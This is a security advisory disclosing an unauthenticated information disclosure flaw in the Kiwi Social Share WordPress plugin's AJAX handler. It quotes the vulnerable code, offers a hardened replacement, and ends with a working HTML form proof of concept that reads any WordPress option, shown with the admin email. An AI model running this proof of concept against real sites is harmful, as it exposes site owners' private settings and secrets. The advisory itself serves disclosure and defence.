Full Disclosure of Information Disclosure Vulnerability in Kiwi Social Share
While looking into an option update vulnerability in the plugin Kiwi Social Share, we noticed that the code right above the code for that vulnerability causes another vulnerability: an information disclosure vulnerability that allows anyone, logged in or not, to view the contents of any WordPress option (setting).
In the file /includes/lib/helpers/class-kiwi-social-share-helper.php the function kiwi_social_share_get_option() is registered with WordPress AJAX functionality for both logged-in requests (the wp_ajax_ hook) and requests from visitors who are not logged in to WordPress (the wp_ajax_nopriv_ hook):
add_action( 'wp_ajax_kiwi_social_share_get_option', 'kiwi_social_share_get_option' );
add_action( 'wp_ajax_nopriv_kiwi_social_share_get_option', 'kiwi_social_share_get_option' );
That function passes the user input from $_POST['args'] straight to the function get_setting_value(), with no nonce check and no capability check, and outputs the JSON-encoded result:
function kiwi_social_share_get_option() {
	if ( ! empty( $_POST ) && $_POST['action'] === 'kiwi_social_share_get_option' ) {
		wp_die( json_encode( Kiwi_Social_Share_Helper::get_setting_value( $_POST['args']['option'], $_POST['args']['default'], $_POST['args']['group'] ) ) );
That function in turn calls get_option() with the user-specified group name, so any option in the wp_options table can be named, and when no option key is given it returns the whole value of that option to be output by the calling function:
public static function get_setting_value( $option = '', $default = '', $group = '' ) {
	if ( empty( $group ) ) {
		$group = 'kiwi_general_settings';
	}

	$options = get_option( $group, array() );

	if ( empty( $option ) ) {
		return $options;
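As an added example (this is not the plugin's code or a fix from its developer), one way to harden the handler is to drop the nopriv hook so that only logged-in users can reach it, require a nonce and the manage_options capability, and only read from an allowlist of the plugin's own option groups instead of whatever group name the client supplies. The nonce action name kiwi_social_share_settings, the POST field name nonce, the replacement function name and the contents of the allowlist are assumptions made for the example.

```php
<?php
// Added example, not the plugin's own code: a hardened replacement for the
// vulnerable kiwi_social_share_get_option() AJAX handler.

// Register only the logged-in hook. The wp_ajax_nopriv_ hook is what let
// unauthenticated visitors reach the handler in the first place.
add_action( 'wp_ajax_kiwi_social_share_get_option', 'kiwi_social_share_get_option_hardened' );

/**
 * Option groups this handler is allowed to read. Anything else stored in
 * wp_options (admin_email, siteurl, other plugins' API keys, ...) is refused.
 * The group names listed here are assumed for illustration.
 */
function kiwi_social_share_allowed_groups() {
	return array(
		'kiwi_general_settings',
		'kiwi_social_share_style',
	);
}

function kiwi_social_share_get_option_hardened() {
	// 1. CSRF protection: the request must carry a nonce created for this
	//    action (assumed name) with wp_create_nonce( 'kiwi_social_share_settings' )
	//    on the settings page and sent in the 'nonce' POST field. On failure
	//    check_ajax_referer() terminates the request with a -1 response.
	check_ajax_referer( 'kiwi_social_share_settings', 'nonce' );

	// 2. Authorization: reading the plugin's settings is an admin task, so
	//    being logged in is not enough on its own.
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_send_json_error( 'forbidden', 403 );
	}

	$args    = ( isset( $_POST['args'] ) && is_array( $_POST['args'] ) ) ? $_POST['args'] : array();
	$group   = isset( $args['group'] ) ? sanitize_key( $args['group'] ) : 'kiwi_general_settings';
	$option  = isset( $args['option'] ) ? sanitize_key( $args['option'] ) : '';
	// The default is treated as a plain string here (an assumption of this example).
	$default = isset( $args['default'] ) ? sanitize_text_field( wp_unslash( $args['default'] ) ) : '';

	// 3. Allowlist: the client never gets to choose an arbitrary option name.
	//    This also covers the empty-$option case, where the helper returns the
	//    whole group, because the group itself has already been approved.
	if ( ! in_array( $group, kiwi_social_share_allowed_groups(), true ) ) {
		wp_send_json_error( 'unknown option group', 400 );
	}

	// Same lookup as the original helper, now restricted to approved groups.
	wp_send_json_success(
		Kiwi_Social_Share_Helper::get_setting_value( $option, $default, $group )
	);
}
```

If the plugin's front-end JavaScript genuinely needs a setting on the public side of the site, the safer pattern is to pass that one value to the script at render time with wp_localize_script() rather than exposing an AJAX endpoint that reads options by name.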
Due to the moderators of the WordPress Support Forum's continued inappropriate behavior we are fully disclosing vulnerabilities in protest until WordPress gets that situation cleaned up, so we are releasing this post and then only trying to notify the developer through the WordPress Support Forum. You can notify the developer of this issue as well. Hopefully the moderators will finally see the light and clean up their act soon, so that these full disclosures will no longer be needed (we hope they end soon).
Proof of Concept
The following proof of concept will display the Admin Email Address set for the website (the admin_email option), whether or not you are logged in. It works by naming that option as the group and leaving the option key empty, so get_setting_value() returns the entire value.
Make sure to replace "[path to WordPress]" with the location of WordPress.
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="kiwi_social_share_get_option" />
<input type="hidden" name="args[group]" value="admin_email" />
<input type="submit" value="Submit" />
</form>
</body>
</html>